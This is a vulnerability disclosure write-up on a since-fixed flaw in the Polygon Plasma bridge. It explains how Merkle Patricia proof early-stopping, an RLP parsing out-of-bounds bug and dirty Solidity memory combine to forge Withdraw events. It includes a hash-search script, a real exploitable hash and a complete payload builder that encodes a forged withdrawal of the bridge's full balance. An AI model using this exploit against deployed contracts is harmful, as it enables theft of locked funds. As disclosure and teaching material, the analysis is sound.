Polygon Bridge Arbitrary Message Forging Using Memory Corruption

Key impact:

No prerequisites or requirements
Single transaction with malicious proof
$800m POL at risk at time of reporting

This is a disclosure of a vulnerability in the Polygon Plasma bridge. The vulnerability has been fixed since July 2024 and the fix has been pushed to the vulnerable library as well.

The Polygon Plasma bridge uses the Merkle Patricia Trie of transaction receipts that is generated with every block to allow a user to prove an event was emitted on Polygon. In the case of POL, this is the Withdraw event that is only emitted when POL is burned by the user.

The first vulnerability was in the MPT proof library, where early stopping on an extension node was possible and the 32-byte hash inside of the extension node would be interpreted as an RLP-encoded transaction receipt.

Normally a hash would not properly parse into a transaction receipt, but a second vulnerability in the RLP parsing library could be exploited to have the parsing go out-of-bounds into unallocated memory for some hashes.

Working out the requirements for such a hash showed that finding one is of low complexity, and a search of the Polygon chain history turned up several hashes that could be used to exploit the RLP bug.

The unallocated memory could be filled with controllable data because of the external call to the MPT verifier. Solidity will fill the memory with the calldata but later decrease the free memory pointer to unallocate said memory.

The RLP parsing for the transaction receipt would jump into this memory and by calculating the exact offsets, the receipt could be fully controlled after the proof.

This means that it was possible to prove that any arbitrary event happened on the Polygon chain, including a Withdraw event for the full amount that was in the Polygon bridge.

[Fig. 01]

Polygon Bridge

The Polygon network employs multiple bridges, such as the PoS bridge, Plasma bridge, FxPortal and the zkEVM bridge. The first three work in a similar manner, using proofs of transaction receipts, but have slightly different use cases. We'll dive deeper into how this works, proving a transaction, and provide you with the required knowledge to understand the bug and exploit. The final exploit was only applicable to the Plasma bridge (https://etherscan.io/address/0x401F6c983eA34274ec46f84D70b31C151321188b), which is the bridge that held all locked POL between Ethereum and Polygon PoS.

The Plasma Bridge

The Polygon Plasma bridge was the first bridge and it was originally meant to be a true Plasma bridge with exit transactions, state proofs and more. The code for this can be found here: https://github.com/maticnetwork/contracts/blob/main/contracts/root/predicates/ERC20Predicate.sol.

However, Plasma is costly and complex, and so it was discontinued for a simpler model that is almost the same as the PoS bridge: proving transaction receipts. The code that is actually active can be found here: https://github.com/maticnetwork/contracts/blob/main/contracts/root/predicates/ERC20PredicateBurnOnly.sol, which are the 'burn only' predicates.

This diagram shows a simplified version of the Plasma bridge. It employs a DepositManager, where users can deposit their POL and it acts as an escrow. The WithdrawManager is responsible for verification of proofs, as well as keeping an exit queue. This exit queue would have been used more if Plasma was used, but it’s currently just a queue with a waiting time of 1 block. This means that you can nearly immediately process your exit NFT after exiting. Finally, there is the predicate contract and there is a type for each token type: ERC20, ERC721 and ERC1155. In the case of the Polygon Plasma bridge, only the ERC20PredicateBurnOnly is used with the ERC20 POL.

The exit function of the predicate looks complex, but it’s actually quite simple. The user has to provide a proof that the Withdraw event was emitted by the token on the Polygon PoS chain. The event contains the receiver and amount of tokens to be released.

Polygon PoS is also an EVM chain (a fork of geth) and so the same data structures are used as Ethereum. More specifically, the events that happened during a transaction are stored in the transaction receipt, which is part of the blockchain. The transaction receipt is stored in a Merkle Patricia Trie, a special trie that is used for encoding data and generating a root hash that can be used to prove the existence of data inside the trie.

Of course, the user needs to have something to prove against: the receipt root hash. This hash is part of a block and so the user also provides a block proof using a normal Merkle proof that the block hash is included in a checkpoint. This checkpoint is not part of the Ethereum specification, but a simple aggregation of block data on Polygon’s side.
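To make the block proof concrete, here is a minimal sketch of a Merkle inclusion check. It is an illustration under assumptions, not Polygon's implementation: the function names are made up for this example, the tree must have a power-of-two number of leaves, and sha256 stands in for keccak256 because Python's standard library does not provide keccak256.

```python
import hashlib


def h(data: bytes) -> bytes:
    # Stand-in hash (assumption): the contracts use keccak256, not sha256.
    return hashlib.sha256(data).digest()


def merkle_root(leaves):
    """Root of a binary Merkle tree over a power-of-two number of leaves."""
    level = list(leaves)
    while len(level) > 1:
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]


def merkle_proof(leaves, index):
    """Sibling hashes from the leaf at `index` up to (but excluding) the root."""
    proof, level = [], list(leaves)
    while len(level) > 1:
        proof.append(level[index ^ 1])  # sibling of the current node
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        index //= 2
    return proof


def check_membership(leaf, index, root, proof):
    """Recompute the root from a leaf and its siblings; the index bits pick left/right."""
    node = leaf
    for sibling in proof:
        node = h(node + sibling) if index % 2 == 0 else h(sibling + node)
        index //= 2
    return node == root


# Hypothetical checkpoint covering 8 "block hashes".
leaves = [h(bytes([i])) for i in range(8)]
root = merkle_root(leaves)
proof = merkle_proof(leaves, 5)
```

In the bridge, the leaf would be derived from the block data (including the receipts root) and the root would be the checkpoint hash stored in the RootChain contract.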

On Ethereum mainnet, there is the RootChain contract (https://github.com/maticnetwork/contracts/blob/main/contracts/root/RootChain.sol) where validators of the Polygon network can submit checkpoints and signatures. Once committed, the checkpoint hash and the data it proves become part of the Polygon PoS history. These hashes cover all data of the Polygon PoS chain, not just those Withdraw events.

The Ethereum protocol makes heavy use of Merkle Patricia tries and RLP. For the sake of this article, we assume that you are familiar with both, but you can read more about them here:

Proving an event

With this prerequisite knowledge, we will dive a bit deeper into how Polygon exactly proved the existence of an event in the chain history.

function startExitWithBurntTokens(bytes calldata data) external {
    ExitPayloadReader.ExitPayload memory payload = data.toExitPayload();
    ExitPayloadReader.Receipt memory receipt = payload.getReceipt();
    uint256 logIndex = payload.getReceiptLogIndex();
    require(logIndex < MAX_LOGS, "Supporting a max of 10 logs");
    uint256 age = withdrawManager.verifyInclusion(
        data,
        0, /* offset */
        false /* verifyTxInclusion */
    );
    ExitPayloadReader.Log memory log = receipt.getLog();

    // "address" (contract address that emitted the log) field in the receipt
    address childToken = log.getEmitter();
    ExitPayloadReader.LogTopics memory topics = log.getTopics();
    // now, inputItems[i] refers to i-th (0-based) topic in the topics array
    // event Withdraw(address indexed token, address indexed from, uint256 amountOrTokenId, uint256 input1, uint256 output1)
    require(
        bytes32(topics.getField(0).toUint()) == WITHDRAW_EVENT_SIG,
        "Not a withdraw event signature"
    );
    require(
        msg.sender == address(topics.getField(2).toUint()), // from
        "Withdrawer and burn exit tx do not match"
    );
    address rootToken = address(topics.getField(1).toUint());
    uint256 exitAmount = BytesLib.toUint(log.getData(), 0); // amountOrTokenId
    withdrawManager.addExitToQueue(
        msg.sender,
        childToken,
        rootToken,
        exitAmount,
        bytes32(0x0),
        true, /* isRegularExit */
        age << 1
    );
}

Looking at the exit function of the ERC20PredicateBurnOnly, we can see that the provided data is first parsed into an ExitPayload using the ExitPayloadReader library. This library simply makes use of the RLPReader library to parse RLP elements into named fields of a struct. This can be viewed here: https://github.com/maticnetwork/contracts/blob/main/contracts/common/lib/ExitPayloadReader.sol. This ExitPayload is a custom defined struct and it contains the necessary parameters for proving, such as the receipt root hash.

Then on further lines, the actual receipt is extracted, as well as its logs and the chosen log index’s topics. The topic has to match the Withdraw event signature and the emitter of the event has to be the correct child token or it will revert. The predicate delegates the verification of the proof to the WithdrawManager using the verifyInclusion function.

In the verification function (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/root/withdrawManager/WithdrawManager.sol#L96-L160) we can see that it uses the MerklePatriciaProof library to verify the transaction receipt against the receipt root hash and afterwards the receipt root hash is proved against the checkpoint hash.

Vulnerabilities

Now that we better understand the Polygon Plasma bridge and how it allows users to submit MPT proofs, we can dive into the actual vulnerabilities.

MerklePatriciaProof

The first vulnerability of this chain was found in the MerklePatriciaProof verification library: https://github.com/maticnetwork/contracts/blob/main/contracts/common/lib/MerklePatriciaProof.sol

Proving data against an MPT root hash requires providing the nodes and the path in the trie. The receipt is stored at the RLP encoding of its transaction index. For example, the receipt of the transaction with index 273 in a block would be placed on the path 8-2-0-1-1-1, which is the nibble sequence of the RLP encoding of 273: rlp(273) = rlp(0x0111) = 0x820111.
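The path derivation can be reproduced in a few lines. This is a small sketch with hypothetical helper names; the integer encoder only handles the short-string case, which is enough for transaction indices.

```python
def rlp_encode_uint(n: int) -> bytes:
    """RLP-encode a non-negative integer (short-string case only)."""
    if n == 0:
        return b"\x80"  # zero is encoded as the empty string
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if len(raw) == 1 and raw[0] < 0x80:
        return raw  # a single byte below 0x80 is its own encoding
    return bytes([0x80 + len(raw)]) + raw


def to_nibbles(data: bytes):
    """Split every byte into its high and low nibble."""
    return [nib for b in data for nib in (b >> 4, b & 0x0F)]


def receipt_path(tx_index: int):
    """Trie path (as nibbles) of the receipt for a given transaction index."""
    return to_nibbles(rlp_encode_uint(tx_index))


path_273 = receipt_path(273)
```

Small indices behave differently: index 5 encodes to the single byte 0x05, so its path is just 0-5.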

The extension and leaf nodes of an MPT carry a prefix: 0 for even-length extension nodes, 1 for odd-length extension nodes, 2 for even-length leaf nodes and 3 for odd-length leaf nodes. This is crucial to verify, because it allows for distinguishing between extension nodes and leaf nodes. A user should only be able to prove data by traversing to a leaf node.
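As a rough illustration of these prefixes, the following sketch decodes the first field of a two-item node into a node type and a nibble path. The function name is hypothetical; the example input 0x0001 is the path field of the extension node that appears in the proof later in this article.

```python
def decode_hex_prefix(encoded: bytes):
    """Return (is_leaf, path_nibbles) for the first field of a 2-item trie node."""
    nibbles = [nib for b in encoded for nib in (b >> 4, b & 0x0F)]
    flag = nibbles[0]
    if flag > 3:
        raise ValueError("invalid hex-prefix flag")
    is_leaf = flag >= 2          # 2 and 3 mark leaf nodes, 0 and 1 extension nodes
    odd_length = flag % 2 == 1   # 1 and 3 mark an odd number of path nibbles
    # For even-length paths the second nibble is padding and is skipped.
    path = nibbles[1:] if odd_length else nibbles[2:]
    return is_leaf, path


extension = decode_hex_prefix(bytes.fromhex("0001"))
```

A verifier that only accepts a terminal node when `is_leaf` is true cannot be stopped on an extension node.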

However, the MerklePatriciaProof library allowed for early stopping on an extension node by simply providing a shorter proof path. In the example given above, the trie would contain branch nodes for nibbles 8 and 2, then an extension node for nibbles 0-1 and finally branch nodes for nibbles 1 and 1.

The exit payload's 9th parameter is the path that the MerklePatriciaProof should take and by taking out the last byte (nibbles 1-1), this proving would terminate earlier after traversing the extension node:

                if (pathPtr + traversed == path.length) {
                    //leaf node
                    if (
                        keccak256(RLPReader.toBytes(currentNodeList[1])) ==
                        keccak256(value)
                    ) {
                        return true;
                    } else {
                        return false;
                    }
                }

In the extension node, the path is in currentNodeList[0], while the hash of the next branch node is in currentNodeList[1]. So by stopping early, you can input the hash inside of value and the proof would succeed.

Here, the value is a parameter freely chosen by the caller as the 7th parameter in the exit payload. Normally this is the RLP-encoded transaction receipt, but by specifying the internal hash inside of the extension node and leaving out the last 2 nibbles, we can terminate on the extension node hash as value.

This is not directly exploitable by itself, because a hash is random and only 32 bytes long, so it can never be correctly parsed into an entire transaction receipt. That’s why we need another bug.
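The early stop can be modeled in a few lines. This is a simplified sketch of the terminal comparison only, not a port of the Solidity library: the function names are hypothetical, nodes are plain Python lists, and the second function shows the idea of a prefix check rather than the exact patch.

```python
EXT_HASH = bytes.fromhex(
    "8cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205"
)
# Extension node: [hex-prefix path for nibbles 0-1, hash of the next node].
extension_node = [bytes.fromhex("0001"), EXT_HASH]


def is_leaf(node) -> bool:
    # The high nibble of the first path byte is the hex-prefix flag (2 or 3 = leaf).
    return (node[0][0] >> 4) >= 2


def terminal_check_vulnerable(node, consumed, path_len, value):
    """Mirrors the snippet above: once the path is used up, compare and return."""
    if consumed == path_len:
        return node[1] == value
    return None  # path not exhausted, traversal would continue


def terminal_check_with_prefix(node, consumed, path_len, value):
    """Same check, but only a leaf node may terminate the proof."""
    if consumed == path_len:
        return is_leaf(node) and node[1] == value
    return None


full_path = [8, 2, 0, 1, 1, 1]   # path of transaction index 273
short_path = full_path[:-2]      # attacker drops the last byte (nibbles 1-1)
consumed = 4                     # nibbles 8, 2 and the extension's 0-1
```

With the shortened path, the vulnerable check accepts the child hash as the proven value, while the prefix-aware variant rejects it.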

RLPReader

The second bug is a bug inside of the RLPReader library.

    function toList(RLPItem memory item) internal pure returns (RLPItem[] memory) {
        require(isList(item));

        uint256 items = numItems(item);
        RLPItem[] memory result = new RLPItem[](items);

        uint256 memPtr = item.memPtr + _payloadOffset(item.memPtr);
        uint256 dataLen;
        for (uint256 i = 0; i < items; i++) {
            dataLen = _itemLength(memPtr);
            result[i] = RLPItem(dataLen, memPtr);
            memPtr = memPtr + dataLen;
        }

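        // Total-length check. This appears to be the check that the fix described
        // under Disclosure added; the vulnerable version trusted each dataLen without it.
        require(memPtr - item.memPtr == item.len);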

        return result;
    }

More specifically, the bug is in toList, the function that parses an RLPItem into a list of RLPItems. Try to spot it for yourself before continuing! Here is the full source: https://github.com/hamdiallam/Solidity-RLP/blob/master/contracts/RLPReader.sol

Indeed, the last RLPItem of the list can be made to go out-of-bounds of the parent RLPItem. In this library, an RLPItem is simply a pointer and a length, which together describe a section of EVM memory. This is separate from Solidity’s memory allocation, but of course they both use the same chunk of memory.

The problem here is that the library directly trusts the data length that is read using the _itemLength function. Each RLP element, either a string or a list, has its length encoded, but that doesn’t mean it is necessarily correct!

So it trusts the length and parses this into an RLPItem, while increasing the memory pointer to loop over each element. As such, the last list element can overflow outside the bounds of the current RLPItem. This is because memPtr + dataLen can be greater than item.memPtr + item.len for the last element, as the dataLen is retrieved from _itemLength and not checked. This is also not checked in numItems, which runs the same loop but only counts the items.
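The overflow is easy to reproduce in a toy model. The sketch below treats a Python bytes object as EVM memory and re-implements the unchecked loop with hypothetical helper names; it assumes the counting loop keeps going while the cursor is below the end of the parent item.

```python
def payload_offset(mem: bytes, ptr: int) -> int:
    """Header size of the RLP item at ptr."""
    b0 = mem[ptr]
    if b0 < 0x80:
        return 0
    if b0 < 0xB8:
        return 1
    if b0 < 0xC0:
        return 1 + (b0 - 0xB7)
    if b0 < 0xF8:
        return 1
    return 1 + (b0 - 0xF7)


def item_length(mem: bytes, ptr: int) -> int:
    """Total length (header + payload) that the item at ptr claims to have."""
    b0 = mem[ptr]
    header = payload_offset(mem, ptr)
    if b0 < 0x80:
        return 1
    if b0 < 0xB8:
        return header + (b0 - 0x80)
    if b0 < 0xC0:
        return header + int.from_bytes(mem[ptr + 1:ptr + header], "big")
    if b0 < 0xF8:
        return header + (b0 - 0xC0)
    return header + int.from_bytes(mem[ptr + 1:ptr + header], "big")


def to_list_unchecked(mem: bytes, ptr: int, length: int):
    """Split a list item into (pointer, length) pairs, trusting every length."""
    end = ptr + length
    cur = ptr + payload_offset(mem, ptr)
    items = []
    while cur < end:
        n = item_length(mem, cur)
        items.append((cur, n))
        cur += n
    return items, cur


# Parent list of 4 bytes: header 0xc3, then a string header 0x83 that claims
# 3 payload bytes although only 2 ("ab") fit inside the parent.
parent = bytes.fromhex("c3836162")
mem = parent + b"EVIL"           # whatever happens to sit behind the item
items, cursor = to_list_unchecked(mem, 0, len(parent))
child_ptr, child_len = items[0]
child_payload = mem[child_ptr + 1:child_ptr + child_len]
```

Here the child item ends at offset 5 while the parent ends at offset 4, so the child's payload picks up one byte from outside the parent. Requiring `cursor - ptr == length` after the loop would reject this input.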

Remember that we have a 32-byte hash as value here, so how can that ever be parsed?

Exploitation

Hash Parsing

To go from the bug to a working exploit, there are a couple of things that we need to get right. The first and most obvious one is getting the extension node hash to be parsed correctly as a receipt. Remember that a hash is a random 32-byte value, but we can ‘control’ a few bytes by bruteforcing one as long as the complexity is low enough to make it practically feasible.

It is possible to find a hash that parses into a receipt (which is just an RLP list of its elements) whose 4th element, the list of logs, goes out-of-bounds. This list of logs then has 2 elements, of which the first is very large, pushing the second element to be read entirely from memory outside of the ExitPayload.

If we follow the code from where the transaction receipt is parsed from an RLPItem to the Receipt struct, we can see that we have the following requirements:

1. The first byte read is popped if it is not a list prefix (a simple < 0xc0 check), which increases the read offset by one. (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/common/lib/ExitPayloadReader.sol#L97)
2. The second read must be a list, because .toList() is called on it. Afterwards the offset increases by the size of the list header, including any encoded length bytes. (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/common/lib/ExitPayloadReader.sol#L95-L108)
3. The third, fourth and fifth reads can be anything, as long as the offset does not go past 27 (leaving space in the 32 bytes of the hash for the other key elements). These are the first 3 elements of the receipt list and they are ignored, because the logs are the 4th element and are accessed directly as data[3]. (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/common/lib/ExitPayloadReader.sol#L145)
4. The sixth read needs to be the long list that facilitates the jump and that will be parsed as the logs of the receipt. In the code we see that .toList() is called on it and the result is indexed using receipt.logIndex, which is separately chosen by the attacker (https://github.com/maticnetwork/contracts/blob/eef53596046eda70a53653a8e5ff79b1cbf0a4f9/contracts/common/lib/ExitPayloadReader.sol#L145). A list check and a minimum length check are sufficient.
5. The final read is the first element of that list, and we want it to be the buffer that catapults the next element into unallocated memory. It can be a long string or a long list, with a minimum length requirement as well as a maximum length requirement (because we need to send that many zero bytes as calldata). By choosing receipt.logIndex = 1, we can skip this large element and parse the next one as the actual Log, which is taken from unallocated (but filled) memory.

Hash Hunting

Now that we know the requirements for a hash to work, we can work on finding one in the entire chain history of the Polygon PoS chain.

def check_hash(h):
    data = bytes.fromhex(h) + 32 * b'\x00'
    offset = 0

    # 1.
    if data[offset] < 0xc0:
        offset += 1

    # 2.
    if data[offset] < 0xc0:
        return False
    offset += get_offset(data[offset])

    # 3.
    for _ in range(3):
        offset += get_length(data[offset:])
        if offset > 27:
            return False

    # 4.
    log_len = get_length(data[offset:])
    if data[offset] < 0xf9 or log_len < 0x800:
        return False
    offset += get_offset(data[offset])
    if offset > 30:
        return False

    # 5.
    if data[offset] < 0xb9 or (data[offset] >= 0xc0 and data[offset] < 0xf9):
        return False
    buffer_len = get_length(data[offset:])
    if buffer_len > (log_len - 3) or buffer_len < 0x800 or buffer_len > 0xfffff:
        return False

    return True

The script above converts these requirements to Python, so we can programmatically look for a hash that works and gives us the ability to prove a value in unallocated memory. We can use this in two ways:

Bruteforce the event values such that an eligible hash is generated inside of the Merkle Patricia trie of the receipt in that block. This would require precisely emitting the right event with the right parameters.
Search the whole chain history for extension node hashes that are eligible.

The first way sounds easier, but it can be difficult to set up. It is possible, but because Polygon PoS emits default FeeTransfer events on each transaction, you would need to control the transactions in a full block. There are plenty of techniques that can make this possible, but the second way is much easier.

If you calculate the complexity of the requirements, you find that it’s really not that high. And with Polygon PoS having 60+ million blocks, there would have to be at least one exploitable hash. And all you need is one.

To do this, I have built a script to find the blocks with a transaction count between 273 and 512, as these will have an extension node (with 0-1) at the path 8-2. The script will take those blocks and calculate part of the Merkle Patricia trie of the transaction receipts under the extension node to get the hash that will be inside of that extension node. Then it checks that hash using the requirements I discussed above.
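A quick check, offered as an illustration rather than as part of the original script, shows why blocks in this size range are interesting: every transaction index from 256 through 511 RLP-encodes to 0x8201xx, so all receipts below the path 8-2 share the nibbles 0-1 as long as no index reaches 512. The helper names are hypothetical.

```python
def rlp_encode_uint(n: int) -> bytes:
    """RLP-encode a non-negative integer (short-string case only)."""
    if n == 0:
        return b"\x80"
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if len(raw) == 1 and raw[0] < 0x80:
        return raw
    return bytes([0x80 + len(raw)]) + raw


def to_nibbles(data: bytes):
    """Split every byte into its high and low nibble."""
    return [nib for b in data for nib in (b >> 4, b & 0x0F)]


def common_prefix(paths):
    """Longest nibble prefix shared by all paths."""
    prefix = []
    for column in zip(*paths):
        if len(set(column)) != 1:
            break
        prefix.append(column[0])
    return prefix


paths = [to_nibbles(rlp_encode_uint(i)) for i in range(256, 512)]
shared = common_prefix(paths)
```

Index 512 encodes to 0x820200, which breaks the shared 0-1 and would turn the node below 8-2 into something other than that single extension node.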

Just as an example, in the block range 16m-17m, there were about 212k blocks that had a transaction count between 273 and 512. The hash checker script terminated quickly, as a hash was already found after a few tens of thousands of blocks.

The block that I found was block 17074251 (https://polygonscan.com/block/17074251) and the hash in the extension node of the receipt trie was 8cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205.

Let’s try to dissect this hash and see how it would be parsed:

8c -> This is less than 0xc0 and will be popped.
f8 a3 -> 0xf8 is the long list of 1-byte length, so 0xa3 will be its length. (The encoded length of list is ignored in RLPReader.toList, but the offset is still increased).
84 e97b4bf8 -> 0x84 is the short string of 4-byte length, so 0xe97b4bf8 is just the 4-byte string. (This is the 1st element of the receipt, contents are ignored).
c8 14e0be6e1c3573d2 -> 0xc8 is the short list of 8-byte length, so 0x14e0be6e1c3573d2 is just an 8-byte list. (This is the 2nd element of the receipt, contents are ignored).
67 -> 0x67 is just a single byte. (This is the 3rd element of the receipt, contents are ignored).
ff df9b8ea8546ba5b5 -> 0xff is the long list with an 8-byte encoded length. This is a very large element and will be parsed as the list of logs (we can handle the large length using an end marker in the final payload).
b9 e5f2 -> 0xb9 is the long string with a 2-byte encoded length, so this is a 0xe5f2 = 58866-byte element that is used for the jump into memory. We need a buffer of zeroes of almost the same size.
a205 -> rest bytes, ignored.

As you can see the hash will work perfectly and allow for proving a jump into unallocated memory!
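The dissection can be replayed programmatically. The check_hash script earlier in this section calls get_offset and get_length without showing them, so the definitions below are assumptions about what they do (header size of an RLP item, and total claimed length of an RLP item), written to match the dissection above.

```python
def get_offset(prefix: int) -> int:
    """Header size in bytes (prefix byte plus any length bytes) of an RLP item."""
    if prefix < 0x80:
        return 0                      # single byte, no header
    if prefix < 0xb8:
        return 1                      # short string
    if prefix < 0xc0:
        return 1 + (prefix - 0xb7)    # long string
    if prefix < 0xf8:
        return 1                      # short list
    return 1 + (prefix - 0xf7)        # long list


def get_length(data: bytes) -> int:
    """Total length (header plus payload) claimed by the RLP item at data[0]."""
    prefix = data[0]
    header = get_offset(prefix)
    if prefix < 0x80:
        return 1
    if prefix < 0xb8:
        return header + (prefix - 0x80)
    if prefix < 0xc0:
        return header + int.from_bytes(data[1:header], "big")
    if prefix < 0xf8:
        return header + (prefix - 0xc0)
    return header + int.from_bytes(data[1:header], "big")


HASH = bytes.fromhex(
    "8cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205"
)
data = HASH + 32 * b"\x00"

offset = 1 if data[0] < 0xc0 else 0     # 0x8c is popped
offset += get_offset(data[offset])      # skip the 0xf8a3 receipt list header
ignored = []
for _ in range(3):                      # first three receipt elements
    ignored.append(data[offset])
    offset += get_length(data[offset:])
logs_offset = offset                    # position of the 0xff... logs list
offset += get_offset(data[offset])      # skip its 9-byte header
buffer_offset = offset                  # position of the 0xb9e5f2 buffer element
jump = get_length(data[offset:]) - get_offset(data[offset])
```

The three ignored elements start with 0x84, 0xc8 and 0x67, the logs list sits at byte 18, the buffer element at byte 27, and its claimed payload is 58866 bytes, in line with the manual walk-through.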

Dirtying unallocated memory

The next problem we need to solve is how to get controllable data in unallocated memory such that we can control the values of the parsed Log struct.

The answer lies in why the ERC20PredicateBurnOnly is the only one affected by the bug and not the PoS bridge or the FxPortal. In the exit function of the predicate, you can see that the order is: parsing into receipt, calling the WithdrawManager to verify the proof, parsing into a log. The order here is very important, as the external call to the WithdrawManager allows us to fill the memory with dirty bytes.

When calling an external function of another contract, Solidity will use the CALL opcode under the hood. This opcode requires pointers to the EVM memory to specify the call’s parameter values. In this case, it’s the entire data bytes parameter that is forwarded, so it will load the whole thing into memory again. Finally, after the call, Solidity will un-allocate this memory by subtracting the size from the free memory pointer. However, it will NOT clear this memory and so it is considered dirty. Normally this is not a problem for Solidity, but when you’re using a library that also makes direct use of memory (cough cough, RLPReader), then things will get messy.

It is indeed as simple as just filling the memory with the right bytes at the right offset, such that the jump from the parsing lands exactly at the memory location where our controlled Log data is. This has to be calculated once beforehand and depends on the exact hash jump value. We can do this with a buffer of zero bytes.
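The effect can be pictured with a toy allocator. This is only a model of the behaviour described above, not of the EVM or of the Solidity compiler: the class, its method names and the byte strings are all hypothetical.

```python
class ToyMemory:
    """Bump allocator with a free pointer that can be moved back without clearing."""

    def __init__(self, size: int = 256):
        self.data = bytearray(size)
        self.free_ptr = 0

    def alloc_and_write(self, payload: bytes) -> int:
        """Write payload at the free pointer and advance the pointer past it."""
        start = self.free_ptr
        self.data[start:start + len(payload)] = payload
        self.free_ptr += len(payload)
        return start

    def release(self, size: int) -> None:
        """Move the free pointer back; the bytes themselves are left in place."""
        self.free_ptr -= size


mem = ToyMemory()
receipt_ptr = mem.alloc_and_write(b"PARSED-RECEIPT")   # parsed before the call

call_args = b"ATTACKER-CONTROLLED-CALLDATA"            # copied for the external call
call_ptr = mem.alloc_and_write(call_args)
mem.release(len(call_args))                            # memory handed back after the call

# A reader that follows raw pointers past the free pointer still sees the copy.
stale = bytes(mem.data[mem.free_ptr:mem.free_ptr + len(call_args)])
```

Anything that later reads by raw pointer past the free pointer, as the out-of-bounds RLP item does, sees the attacker's bytes.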

Building The Exploit

Now that we have all the pieces, it is time to build the final exploit and string it all together.

We will build the malicious exit payload proof for the block and extension node hash mentioned earlier. Polygon has a neat API that we can use to get the real exit payload and we will use that as a base for ours. To get the payload for the last transaction in the block: https://proof-generator.polygon.technology/api/v1/matic/exit-payload/0x4b1c4cc63d0eabcdafef769e57ccf83aca44b36654158b41c98a9360c054e471?eventSignature=0x4dfe1bbbcf077ddc3e01291eea2d5c70c2b422b415d95645b9adcfd678cb1d63.

The exit payload we get back is for this transaction specifically, but we don't need to prove a specific transaction, instead we only need to prove up to the extension node. So we can simplify the exit payload by removing the last 2 proof elements from the MPT proof. We also need to shorten the MPT proof path and replace the 7th element of the exit payload (the transaction receipt) with the extension node hash. This is the value that is later passed to the MPT proof function, since now we need to prove the hash and not the transaction receipt.

The checkpoint header number, Merkle block proof, block number, block timestamp, transactions root and receipts root can all stay the same. The log index should be 1.

To correctly recalculate the RLP encoding length, we can just use some Python code (the values here are manually extracted from the exit payload API):

from rlp import encode

print(encode([
    0x09c18f00, # checkpoint header number
    bytes.fromhex( # Merkle proof for the block in the checkpoint
        '4a01e6469ac2b72c1f1ff8f1e6ef3a097d8be76103612117b4da280710760e57'
        'fd733856d8e14f5e7e80dddaa299da368f2e407f085c4383a1e8d4993434e210'
        'a76b353c813c506402fe06d6845fe25dae1fd079e77d6268ae0d659ada72fe9b'
        'a1c706894efa3a461f5f639786ab218297b9336b86fbe6cd1c1f8a8a46e56567'
        '5c950ffdbc87115c371ab36bc047465e71eb9e785c0a8ba7dfbde9116c3c57c9'
        'e93e2acf9ad7ac8d1a3c1fc161e25dcec5a16f5a54383c1775a5a95173940b2e'
        'cfe4eb135e3cbc26029d65a45a4d22798607e7abca14756e1cdaffc9e6ae4bb6'
        'dffadb374856e351304fb188df45d8e779b586fb8a995994ccfb356bb09754ab'
        'c14613ad75752d6b0d2e12e360915e89cf896d0863b685605b6226256261375c'
    ),
    0x0104884b, # block number
    0x60f6e2ff, # block timestamp
    bytes.fromhex( # Block transactions root
        '7554f1231705203d4267458996252844ffb831cc03a33c8abf790ab08e45eb63'
    ),
    bytes.fromhex( # Block receipt root
        'b0c00b94ddee17557e21363f2a743edcf8c7fcb4ca06e331fa617ece4e758e7a'
    ),
    bytes.fromhex( # Receipt (which is actually the extension node's hash)
        '8cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205'
    ),
    bytes.fromhex( # MPT proof to the extension node
        'f901ccf90131a0c04d1a2cfe8fdf067af18383c3455cbcc44c77435312104792'
        '9149a9145cfad8a068e5704bf5d951293b712f6d15affd737aabd7e6be7fff75'
        '1cd2fbcbb20b247aa083888ac83329b481bb389821748c9ec10a19d12507a44b'
        '3c0c26dca18bda04dca00d88cff9167ce051c7cc77b685350d47dd26eb637a50'
        'c9d64e24822029a8f653a05dbfd66b811a34ba30d72aa93ca7e3012f22171406'
        '5fb326857d23d4abe417c9a03fecc2ad9ba3c34cc8b3be67d1b4b1ff5623b9c9'
        '2e25d563d8081c137b8e990ba05e12ccf34caf0eeeea3f5b5e36fd494878685a'
        'f17715732b042e6e7d6534f7c2a0b26edfbfc6a0caf5ed26a0d27d6c51b600a3'
        '0748db98d7897d38420ed0ffb27ca0e286fd36ff52c20772c4db850c8f2d7efa'
        '443f492608723646853e4e6edbc5728080808080808080f871a0f033bac053f5'
        '280c7938cabd1addaf4573d2588eb3b1e6e6ad7d5cd7456bbfa5a0d496eb962f'
        'c6a3548b45a1ddc27d16db0fa1bebd45fec668fb13b5119bfbf26ca05a32a034'
        '0bcda816eb25c89449694bcffcf01295d4606caeb09c7f74f6baaa8c8080808080'
        '808080808080808080e4820001a08cf8a384e97b4bf8c814e0be6e1c3573d267'
        'ffdf9b8ea8546ba5b5b9e5f2a205'
    ),
    bytes.fromhex( # MPT proof path
        '008201'
    ),
    1, # Log index
    57049 * b'\x00' + # Buffer to align the injected log with the jump
    encode([
        bytes.fromhex('0000000000000000000000000000000000001010'), # Emitter = MATIC on PoS
        [
            bytes.fromhex( # Withdraw event signature
                'ebff2602b3f468259e1e99f613fed6691f3a6526effe6ef3e768ba7ae7a36c4f'
            ),
            bytes.fromhex( # Root token (MATIC on mainnet)
                '0000000000000000000000007D1AfA7B718fb893dB30A3aBc0Cfc608AaCfeBB0'
            ),
            bytes.fromhex( # Receiver (standard Forge contract address)
                '0000000000000000000000007FA9385bE102ac3EAc297483Dd6233D62b3e1496'
            )
        ],
        ( # Amount = MATIC balance of bridge at block 20550962
            1450861658108415095557765013
        ).to_bytes(32, 'big')
    ]) + \
    b'\xbf\xff\xff\xff\xff\xff\xff\xff\xff' # End marker to stop the list parsing
]).hex())

